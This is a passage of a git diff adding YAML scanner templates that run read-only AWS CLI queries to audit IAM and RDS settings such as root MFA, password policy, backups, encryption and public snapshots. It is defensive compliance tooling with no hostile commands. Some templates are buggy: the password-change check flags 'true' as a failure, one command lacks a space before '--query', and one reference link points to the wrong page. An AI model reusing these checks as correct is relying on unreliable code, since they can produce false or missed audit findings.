+ - '"MFA is no enabled for IAM User " + user'
+# digest: 4a0a00473045022100f326cf9a9fdd5f737d1126dd4938a233059a58f816e7e75a9a0bbab2f9a5d8230220219f4277870b52c124be28db9d8adfe6b88d2ea8b1570756a3f7772384887eff:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/iam/iam-password-policy.yaml b/cloud/aws/iam/iam-password-policy.yaml
new file mode 100644
index 0000000000..0462830302
--- /dev/null
+++ b/cloud/aws/iam/iam-password-policy.yaml
@@ -0,0 +1,29 @@
+id: iam-password-policy
+info:
+ name: IAM Password Policy Not Configured
+ author: princechaddha
+ severity: medium
+ description: |
+ Verifies that Amazon IAM users adhere to a strong password policy, including requirements for minimum length, expiration, and pattern
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/iam/get-account-password-policy.html
+ tags: cloud,devops,aws,amazon,iam,aws-cloud-config
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam get-account-password-policy
+
+ matchers:
+ - type: word
+ words:
+ - "NoSuchEntity"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"AWS cloud account is not configured with a custom IAM password policy"'
+# digest: 490a00463044022055c5e7c44c862bac281cda22b1f74de43c5c590680abbfdef4c7814f844af67702205eb87929fe29247fa90db958e8c56b23e62472b680ae98f265da4a2e57d53f95:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/iam/iam-root-mfa.yaml b/cloud/aws/iam/iam-root-mfa.yaml
new file mode 100644
index 0000000000..9a855e2acd
--- /dev/null
+++ b/cloud/aws/iam/iam-root-mfa.yaml
@@ -0,0 +1,29 @@
+id: iam-root-mfa
+info:
+ name: MFA not enabled on AWS Root Account
+ author: princechaddha
+ severity: high
+ description: |
+ Checks if Multi-Factor Authentication (MFA) is enabled for the AWS root account
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/iam/get-account-summary.html
+ tags: cloud,devops,aws,amazon,iam,aws-cloud-config
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam get-account-summary | jq -r '.SummaryMap.AccountMFAEnabled'
+
+ matchers:
+ - type: word
+ words:
+ - "0"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"MFA is not enabled on your AWS Root account"'
+# digest: 4b0a00483046022100add350e50addd6d7c475c7ab805a9869384178065cc1aef7e96777448765fa2e022100cd5ae007e6406f2f721bc5d308de70f92456f2d0280b778690b85a80cd2fdb23:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/iam/iam-ssh-keys-rotation.yaml b/cloud/aws/iam/iam-ssh-keys-rotation.yaml
new file mode 100644
index 0000000000..ca9e3a8066
--- /dev/null
+++ b/cloud/aws/iam/iam-ssh-keys-rotation.yaml
@@ -0,0 +1,50 @@
+id: iam-ssh-keys-rotation
+info:
+ name: SSH Key Rotation - 90-Day Policy
+ author: princechaddha
+ severity: high
+ description: |
+ Verifies that IAM SSH public keys are rotated every 90 days, enhancing security and preventing unauthorized access to AWS CodeCommit repositories
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/iam/list-ssh-public-keys.html
+ tags: cloud,devops,aws,amazon,iam,ssh,aws-cloud-config
+
+flow: |
+ code(1)
+ for(let UserName of iterate(template.users)){
+ set("user", UserName)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam list-users --query 'Users[*].UserName'
+
+ extractors:
+ - type: json # type of the extractor
+ internal: true
+ name: users
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam list-ssh-public-keys --user-name $user | jq -r '.SSHPublicKeys[] | select(.UploadDate | fromdateiso8601 < (now - (90 * 86400))) | .SSHPublicKeyId'
+
+ extractors:
+ - type: regex # type of the extractor
+ name: accesskey
+ internal: true
+ regex:
+ - '^AP.*'
+
+ - type: dsl
+ dsl:
+ - '"The SSH Public Key " + accesskey +" is older than 90 days"'
+# digest: 490a00463044022017e707c66f9a058bd875e7a516d99585a1be526405545647011958874bd784a702201259fdf89b05b2fa171d789e014fe98d7949010ff420be02f0ef7183565544ef:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/iam/iam-unapproved-policy.yaml b/cloud/aws/iam/iam-unapproved-policy.yaml
new file mode 100644
index 0000000000..9392c5117c
--- /dev/null
+++ b/cloud/aws/iam/iam-unapproved-policy.yaml
@@ -0,0 +1,38 @@
+id: iam-unapproved-policy
+info:
+ name: Unapproved IAM Policy Attachments
+ author: princechaddha
+ severity: high
+ description: |
+ Checks for the attachment of unapproved Amazon IAM managed policies to IAM roles, users, or groups, ensuring compliance with organizational access policies
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/iam/get-policy.html
+ tags: cloud,devops,aws,amazon,iam,ssl,tls,aws-cloud-config
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam get-policy --policy-arn arn:aws:iam::aws:policy/AmazonRDSFullAccess --query 'Policy.{"AttachmentCount": AttachmentCount}'
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "AttachmentCount"
+
+ - type: word
+ part: body
+ words:
+ - '"AttachmentCount": 0'
+ negative: true
+
+ extractors:
+
+ - type: dsl
+ dsl:
+ - '"Unapproved IAM policy is used within your AWS cloud account"'
+# digest: 4a0a00473045022100cf22f4542262ded32bcf64050e268d3b514e907385f8c67a8a4f888302bb48b202206b2ee99707ba578560bc83ad3ceeae5e3981288199d898d27d0090f34f6af408:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/iam/iam-user-password-change.yaml b/cloud/aws/iam/iam-user-password-change.yaml
new file mode 100644
index 0000000000..483c80c910
--- /dev/null
+++ b/cloud/aws/iam/iam-user-password-change.yaml
@@ -0,0 +1,29 @@
+id: iam-user-password-change
+info:
+ name: Enable Self-Service Password Change for IAM Users
+ author: princechaddha
+ severity: high
+ description: |
+ Verifies that all Amazon IAM users have permissions to change their own console passwords, allowing access to 'iam:ChangePassword' for their accounts and 'iam:GetAccountPasswordPolicy' action.
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/iam/get-account-password-policy.html
+ tags: cloud,devops,aws,amazon,iam,aws-cloud-config
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam get-account-password-policy --query 'PasswordPolicy.AllowUsersToChangePassword'
+
+ matchers:
+ - type: word
+ words:
+ - "true"
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"AllowUsersToChangePassword Policy is not enabled in your AWS account"'
+# digest: 4b0a00483046022100b046545d3c72c54dee9c4051661d61c8241cbce1fb0f655fa4bb1e8461b3f295022100a7bb33ba3ddff07e68db9bd748802715215b8d62be69ab27fab22c5e539cbb28:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/iam/ssl-cert-renewal.yaml b/cloud/aws/iam/ssl-cert-renewal.yaml
new file mode 100644
index 0000000000..a917d78872
--- /dev/null
+++ b/cloud/aws/iam/ssl-cert-renewal.yaml
@@ -0,0 +1,30 @@
+id: ssl-cert-renewal
+info:
+ name: SSL/TLS Certificates in AWS IAM about to expire in 30 days
+ author: princechaddha
+ severity: medium
+ description: |
+ Checks if SSL/TLS certificates in AWS IAM are set for renewal 30 days before expiration.
+ reference:
+ - https://docs.aws.amazon.com/cli/latest/reference/iam/get-account-password-policy.html
+ tags: cloud,devops,aws,amazon,iam,ssl,tls,aws-cloud-config
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws iam list-server-certificates | jq -r '.ServerCertificateMetadataList[] | select(.Expiration | fromdateiso8601 - now < (30 * 86400)) | .ServerCertificateName'
+
+ extractors:
+ - type: regex
+ name: certificate
+ internal: true
+ regex:
+ - '\b[a-zA-Z0-9]+\b'
+
+ - type: dsl
+ dsl:
+ - 'certificate + " Certificate is about to expire in 30 days"'
+# digest: 4a0a00473045022100a517288f527ffb0f08d1f6803d7d738d8c9ed2a34f35e32b824cabbe7f3fa41b022028ebdfe7453cc66f3f511e46c5ffbda6db8dc43551271a101edb11021fad7fd3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/aurora-copy-tags-snap.yaml b/cloud/aws/rds/aurora-copy-tags-snap.yaml
new file mode 100644
index 0000000000..bfefd94533
--- /dev/null
+++ b/cloud/aws/rds/aurora-copy-tags-snap.yaml
@@ -0,0 +1,56 @@
+id: aurora-copy-tags-snap
+info:
+ name: Aurora Snapshot Tag Copy
+ author: princechaddha
+ severity: high
+ description: |
+ Ensures Amazon Aurora clusters have Copy Tags to Snapshots feature enabled to automatically copy tags from clusters to snapshots.
+ impact: |
+ Without this, tags identifying ownership, purpose, or other critical information aren't propagated to snapshots, complicating management and compliance.
+ remediation: |
+ Enable Copy Tags to Snapshots for Aurora clusters via the AWS Management Console or modify the DB cluster to include this feature using AWS CLI.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/USER_Tagging.html
+ tags: cloud,devops,aws,amazon,aurora,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+flow: |
+ code(1)
+ for(let clustername of iterate(template.clusters)){
+ set("cluster", clustername)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-clusters --region $region --output json --query 'DBClusters[?Engine==`aurora-mysql` || Engine==`aurora-postgresql`].DBClusterIdentifier | []'
+
+ extractors:
+ - type: json
+ name: clusters
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-clusters --region $region --db-cluster-identifier $cluster --query 'DBClusters[*].CopyTagsToSnapshot'
+
+ matchers:
+ - type: word
+ words:
+ - 'false'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Copy Tags To Snapshot is not enable for cluster " + cluster'
+# digest: 490a00463044022017828b27f24bd205df0e6c14c80b4cae52d2f6366dde8c60cc58302d7ca9c8ba022062233631583c3e674bb1daebdb9375c3501900fb1ba9ed7a06d972f8b7265b85:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/aurora-delete-protect.yaml b/cloud/aws/rds/aurora-delete-protect.yaml
new file mode 100644
index 0000000000..c7ae76d4fb
--- /dev/null
+++ b/cloud/aws/rds/aurora-delete-protect.yaml
@@ -0,0 +1,56 @@
+id: aurora-delete-protect
+info:
+ name: Aurora Cluster Deletion Protection
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure Amazon Aurora clusters have Deletion Protection enabled to prevent accidental data loss.
+ impact: |
+ Without Deletion Protection, Aurora clusters can be accidentally deleted, leading to irreversible data loss.
+ remediation: |
+ Enable Deletion Protection by modifying the Aurora cluster settings in the AWS Management Console or via the AWS CLI.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/AuroraUserGuide/DBInstanceDeletionProtection.html
+ tags: cloud,devops,aws,amazon,aurora,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+flow: |
+ code(1)
+ for(let clustername of iterate(template.clusters)){
+ set("cluster", clustername)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-clusters --region $region --output json --query 'DBClusters[?Engine==`aurora-mysql` || Engine==`aurora-postgresql`].DBClusterIdentifier | []'
+
+ extractors:
+ - type: json
+ name: clusters
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-clusters --region $region --db-cluster-identifier $cluster--query 'DBClusters[*].DeletionProtection'
+
+ matchers:
+ - type: word
+ words:
+ - 'false'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Deletion Protection safety feature is not enabled for " + cluster'
+# digest: 4b0a00483046022100c1c1ed75c7401266f13e1fc388a357df843c7994ab44ae8f501b14842ab7ec24022100b6c077b49006fb9ca13885abddf6be9c787d64eb415a13972e5fa3ea637792f3:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/iam-db-auth.yaml b/cloud/aws/rds/iam-db-auth.yaml
new file mode 100644
index 0000000000..c76c5618b5
--- /dev/null
+++ b/cloud/aws/rds/iam-db-auth.yaml
@@ -0,0 +1,56 @@
+id: iam-db-auth
+info:
+ name: IAM Database Authentication
+ author: princechaddha
+ severity: medium
+ description: |
+ Ensure IAM Database Authentication is enabled for RDS instances, allowing IAM service to manage database access, thereby removing the need to store user credentials within database configurations.
+ impact: |
+ Without IAM Database Authentication, database credentials need to be managed internally, increasing the risk of credential leakage and unauthorized access.
+ remediation: |
+ Enable IAM Database Authentication for MySQL and PostgreSQL RDS database instances to leverage IAM for secure, token-based access control.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/UsingWithRDS.IAMDBAuth.html
+ tags: cloud,devops,aws,amazon,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+flow: |
+ code(1)
+ for(let DBInstances of iterate(template.instances)){
+ set("db", DBInstances)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-instances --region $region --output json --query 'DBInstances[?Engine==`mysql` || Engine==`postgres`].DBInstanceIdentifier | []'
+
+ extractors:
+ - type: json
+ name: instances
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-instances --region $region --db-instance-identifier $db --query 'DBInstances[*].IAMDatabaseAuthenticationEnabled'
+
+ matchers:
+ - type: word
+ words:
+ - 'false'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Database Authentication feature is not enabled for RDS database instance " + db'
+# digest: 4a0a00473045022100de421600413f2bb3306a9173334cd465c628dd5a198cec9ebe3bf5a373b4479602200bd9a29ac4bc3efe52763411a53243855f599f703baa22c7292da16898754f12:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/rds-backup-enable.yaml b/cloud/aws/rds/rds-backup-enable.yaml
new file mode 100644
index 0000000000..4a61f55d05
--- /dev/null
+++ b/cloud/aws/rds/rds-backup-enable.yaml
@@ -0,0 +1,56 @@
+id: rds-backup-enable
+info:
+ name: RDS Automated Backup Check
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure that your Amazon RDS database instances have automated backups enabled for point-in-time recovery.
+ impact: |
+ Lack of automated backups can lead to data loss in case of accidental deletion or database corruption.
+ remediation: |
+ Enable automated backups for RDS instances by setting the backup retention period to a value other than 0.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_WorkingWithAutomatedBackups.html
+ tags: cloud,devops,aws,amazon,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+flow: |
+ code(1)
+ for(let DBInstances of iterate(template.instances)){
+ set("db", DBInstances)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-instances --region $region --output json --query 'DBInstances[*].DBInstanceIdentifier'
+
+ extractors:
+ - type: json
+ name: instances
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-instances --region $region --db-instance-identifier $db --query 'DBInstances[*].BackupRetentionPeriod'
+
+ matchers:
+ - type: word
+ words:
+ - '0'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"Automated backups are not enabled for " + db + " RDS database instance"'
+# digest: 490a0046304402202cafc27efb26d112eaeeda54182636abc27e1c7d4c685250eee139e6016ad0e00220696ff967f5e74543e24b1f563a48870e20c7a651ebf098221cb3aa53d92d0a4a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/rds-deletion-protection.yaml b/cloud/aws/rds/rds-deletion-protection.yaml
new file mode 100644
index 0000000000..9e3cf32f15
--- /dev/null
+++ b/cloud/aws/rds/rds-deletion-protection.yaml
@@ -0,0 +1,57 @@
+id: rds-deletion-protection
+info:
+ name: RDS Deletion Protection
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure Amazon RDS instances have Deletion Protection enabled to prevent accidental deletions.
+ impact: |
+ Without Deletion Protection, RDS instances can be inadvertently deleted, leading to potential data loss and service disruption.
+ remediation: |
+ Enable Deletion Protection for all Amazon RDS instances via the AWS Management Console or using the AWS CLI.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_DeleteInstance.html
+ tags: cloud,devops,aws,amazon,rds,aws-cloud-config
+
+
+variables:
+ region: "ap-northeast-1"
+
+flow: |
+ code(1)
+ for(let DBInstances of iterate(template.instances)){
+ set("db", DBInstances)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-instances --region $region --output json --query 'DBInstances[*].DBInstanceIdentifier'
+
+ extractors:
+ - type: json
+ name: instances
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-instances --region $region --db-instance-identifier $db --query 'DBInstances[*].DeletionProtection' --output json
+
+ matchers:
+ - type: word
+ words:
+ - 'false'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"RDS Deletion protection feature is not enabled for RDS database instance " + db'
+# digest: 4b0a00483046022100914032dbc9479e0c23f03d553ff358b24dbb159d2b0e39591c929e1b7392f357022100dd0d109579a0dba307e0e203996af0754cc7d40cf1ef7adb218b01cba7fae2a0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/rds-encryption-check.yaml b/cloud/aws/rds/rds-encryption-check.yaml
new file mode 100644
index 0000000000..0738c976ec
--- /dev/null
+++ b/cloud/aws/rds/rds-encryption-check.yaml
@@ -0,0 +1,56 @@
+id: rds-encryption-check
+info:
+ name: RDS Instance Encryption
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure that your Amazon RDS database instances are encrypted to fulfill compliance requirements for data-at-rest encryption.
+ impact: |
+ Non-encrypted RDS instances may lead to data breaches, failing to comply with data protection regulations, which could result in hefty fines and loss of reputation.
+ remediation: |
+ Enable encryption for your Amazon RDS instances by modifying the instance and setting the "Storage Encrypted" option to true. For new instances, enable encryption within the launch wizard.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Overview.Encryption.html
+ tags: cloud,devops,aws,amazon,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+flow: |
+ code(1)
+ for(let DBInstances of iterate(template.instances)){
+ set("db", DBInstances)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-instances --region $region --output json --query 'DBInstances[*].DBInstanceIdentifier'
+
+ extractors:
+ - type: json
+ name: instances
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-instances --region $region --db-instance-identifier $db --query 'DBInstances[*].{"StorageEncrypted":StorageEncrypted,"KmsKeyId":KmsKeyId}'
+
+ matchers:
+ - type: word
+ words:
+ - 'false'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"The encryption of data at rest is not enabled for " + db + " RDS database instance"'
+# digest: 4a0a00473045022057333f0cba59e048aec18908bd8cbda6a4ab5398581190a3602a82d1f7f63f140221008c6002f40daa4eef203c0be542377e675dd0b28d3595fa4664449f30f13f325d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/rds-event-notify.yaml b/cloud/aws/rds/rds-event-notify.yaml
new file mode 100644
index 0000000000..550824d617
--- /dev/null
+++ b/cloud/aws/rds/rds-event-notify.yaml
@@ -0,0 +1,36 @@
+id: rds-event-notify
+info:
+ name: RDS Event Notification Absence
+ author: princechaddha
+ severity: medium
+ description: |
+ Checks for the activation of event notifications for Amazon RDS instances to monitor significant database events.
+ impact: |
+ Without event notifications, there's a risk of missing critical database events, impacting operational awareness and incident response.
+ remediation: |
+ Enable event notifications in Amazon RDS by creating an event subscription with Amazon SNS to receive notifications.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_Events.html
+ tags: cloud,devops,aws,amazon,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-event-subscriptions --region $region --query 'EventSubscriptionsList'
+
+ matchers:
+ - type: word
+ words:
+ - '[]'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"No event notifications for RDS resources in " + region + " AWS region"'
+# digest: 4a0a0047304502203da20f61e273f1598025e8b5fc491882b2b9b93d743bf7be37209af3351653b0022100b109b8c9e591621fe1c087381073e5d49cad3d424fa9a3491609c28d4bb8cbdf:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/rds-event-sub-enable.yaml b/cloud/aws/rds/rds-event-sub-enable.yaml
new file mode 100644
index 0000000000..794689aa19
--- /dev/null
+++ b/cloud/aws/rds/rds-event-sub-enable.yaml
@@ -0,0 +1,36 @@
+id: rds-event-sub-enable
+info:
+ name: RDS Event Subscription Not Enabled
+ author: princechaddha
+ severity: high
+ description: |
+ Ensures Amazon RDS event notifications are enabled for database instance level events, allowing for real-time alerts on operational changes.
+ impact: |
+ Lack of event notifications may delay the response to critical RDS operational events, affecting database availability and performance.
+ remediation: |
+ Enable RDS event notification subscriptions for relevant database instance level events through the AWS Management Console or AWS CLI.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_Events.html
+ tags: cloud,devops,aws,amazon,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-event-subscriptions --region $region --query "EventSubscriptionsList[?SourceType == 'db-instance'].CustSubscriptionId"
+
+ matchers:
+ - type: word
+ words:
+ - '[]'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"There are no Amazon RDS event subscriptions created for instance level events in " + region + " AWS region"'
+# digest: 4a0a00473045022046dbc7d74b95e340ebc6d0bc27c308f378cea938470e758605822ac111ed6843022100ba1ee6fdbb6940216c57cbd8666cb56a4645ad5f8138bd63b649fb85abf80b5f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/rds-event-sub.yaml b/cloud/aws/rds/rds-event-sub.yaml
new file mode 100644
index 0000000000..a1352a3b91
--- /dev/null
+++ b/cloud/aws/rds/rds-event-sub.yaml
@@ -0,0 +1,36 @@
+id: rds-event-sub
+info:
+ name: RDS Security Group Event Notifications
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure RDS event notification subscriptions are active for database security group events to monitor and react to changes in security configurations.
+ impact: |
+ Without notifications for security group events, unauthorized changes may go unnoticed, potentially leading to security breaches or data exposure.
+ remediation: |
+ Enable Amazon RDS event notification subscriptions for relevant database security group events through the AWS Management Console or AWS CLI.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_Events.html
+ tags: cloud,devops,aws,amazon,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-event-subscriptions --region $region --query "EventSubscriptionsList[?SourceType == 'db-security-group'].CustSubscriptionId"
+
+ matchers:
+ - type: word
+ words:
+ - '[]'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"There are no Amazon RDS event subscriptions created for database security groups available in " + region + " AWS region."'
+# digest: 4a0a00473045022100d0e7c297ffbf01f4d58eb375f52c497c11d13d84ee6bef8ed036f4a106d379c202206dc81dfc93a492e7f043e3f0e9ca706ce541e875fcf1cec0345a2082cb41fdb6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/rds-gp-ssd-usage.yaml b/cloud/aws/rds/rds-gp-ssd-usage.yaml
new file mode 100644
index 0000000000..f352ac58ab
--- /dev/null
+++ b/cloud/aws/rds/rds-gp-ssd-usage.yaml
@@ -0,0 +1,56 @@
+id: rds-gp-ssd-usage
+info:
+ name: RDS General Purpose SSD Usage
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure Amazon RDS instances use General Purpose SSDs for cost-effective storage suitable for a wide range of workloads, except for applications needing over 10000 IOPS or 160 MiB/s throughput.
+ impact: |
+ Using Provisioned IOPS SSDs when not required can significantly increase AWS costs without providing necessary performance benefits.
+ remediation: |
+ Convert RDS instances from Provisioned IOPS to General Purpose SSDs to optimize costs without sacrificing I/O performance for most database workloads.
+ reference:
+ - https://aws.amazon.com/rds/features/storage/
+ tags: cloud,devops,aws,amazon,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+flow: |
+ code(1)
+ for(let DBInstances of iterate(template.instances)){
+ set("db", DBInstances)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-instances --region $region --output json --query 'DBInstances[*].DBInstanceIdentifier'
+
+ extractors:
+ - type: json
+ name: instances
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-instances --region $region --db-instance-identifier $db --query 'DBInstances[*].StorageType'
+
+ matchers:
+ - type: word
+ words:
+ - 'io1'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - 'db + " RDS instance uses Provisioned IOPS SSD, not the most cost-effective storage"'
+# digest: 4a0a00473045022002f5c7fdd4d9d80a6820cfc1f222bfed3a1d9ad2e9f25cd1ef7757d60774a7dc022100c202e64f627d1aadd2a131aecdc048917a11798572597b382064897ed0848d3d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/rds-public-snapshot.yaml b/cloud/aws/rds/rds-public-snapshot.yaml
new file mode 100644
index 0000000000..6e067db633
--- /dev/null
+++ b/cloud/aws/rds/rds-public-snapshot.yaml
@@ -0,0 +1,56 @@
+id: rds-public-snapshot
+info:
+ name: RDS Public Snapshot Exposure
+ author: princechaddha
+ severity: high
+ description: |
+ Checks if AWS RDS database snapshots are publicly accessible, risking exposure of sensitive data.
+ impact: |
+ Public snapshots can expose sensitive data to unauthorized users, leading to potential data breaches.
+ remediation: |
+ Modify the snapshot's visibility settings to ensure it is not public, only shared with specific AWS accounts.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_ShareSnapshot.html
+ tags: cloud,devops,aws,amazon,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+flow: |
+ code(1)
+ for(let RDPsnaps of iterate(template.snapshots)){
+ set("snapshot", RDPsnaps)
+ code(2)
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-snapshots --region $region --snapshot-type manual --output json --query 'DBSnapshots[*].DBSnapshotIdentifier'
+
+ extractors:
+ - type: json
+ name: snapshots
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-snapshot-attributes --region $region --db-snapshot-identifier $snapshot --query 'DBSnapshotAttributesResult.DBSnapshotAttributes'
+
+ matchers:
+ - type: word
+ words:
+ - '"all"'
+
+ extractors:
+ - type: dsl
+ dsl:
+ - '"RDS snapshot " + snapshot + " is public"'
+# digest: 4a0a0047304502210081a28e626fa15113ec4728cae1cd78218b292f7c71adc72cdb0b6d957475955302207063c6eda8c853ca2b1041f2751246979a75381a89e64b262b679667da1eb1eb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/cloud/aws/rds/rds-public-subnet.yaml b/cloud/aws/rds/rds-public-subnet.yaml
new file mode 100644
index 0000000000..7937f55c6b
--- /dev/null
+++ b/cloud/aws/rds/rds-public-subnet.yaml
@@ -0,0 +1,74 @@
+id: rds-public-subnet
+info:
+ name: RDS Instance Private Subnet
+ author: princechaddha
+ severity: high
+ description: |
+ Ensure Amazon RDS database instances are not provisioned in VPC public subnets to avoid direct Internet exposure.
+ impact: |
+ RDS instances in public subnets can be directly accessed from the Internet, increasing the risk of unauthorized access and potential data breaches.
+ remediation: |
+ Migrate RDS instances to private subnets within the VPC and ensure proper network ACLs and security group settings are in place to restrict access.
+ reference:
+ - https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/USER_VPC.WorkingWithRDSInstanceinaVPC.html#USER_VPC.Subnets
+ tags: cloud,devops,aws,amazon,rds,aws-cloud-config
+
+variables:
+ region: "ap-northeast-1"
+
+flow: |
+ code(1)
+ for(let DBInstances of iterate(template.instances)){
+ set("db", DBInstances)
+ code(2)
+ for(let SubnetNames of iterate(template.subnets)){
+ set("subnet", SubnetNames)
+ code(3)
+ }
+ }
+
+self-contained: true
+code:
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-instances --region $region --output json --query 'DBInstances[*].DBInstanceIdentifier'
+
+ extractors:
+ - type: json
+ name: instances
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws rds describe-db-instances --region $region --db-instance-identifier $db --query 'DBInstances[*].DBSubnetGroup.Subnets[*].SubnetIdentifier[]'
+
+ extractors:
+ - type: json
+ name: subnets
+ internal: true
+ json:
+ - '.[]'
+
+ - engine:
+ - sh
+ - bash
+ source: |
+ aws ec2 describe-route-tables --region $region --filters "Name=association.subnet-id,Values=$subnet" --query 'RouteTables[*].Routes[]'
+
+ matchers:
+ - type: word
+ words:
+ - 'igw-'
+ - '0.0.0.0/0'
+
+ extractors:
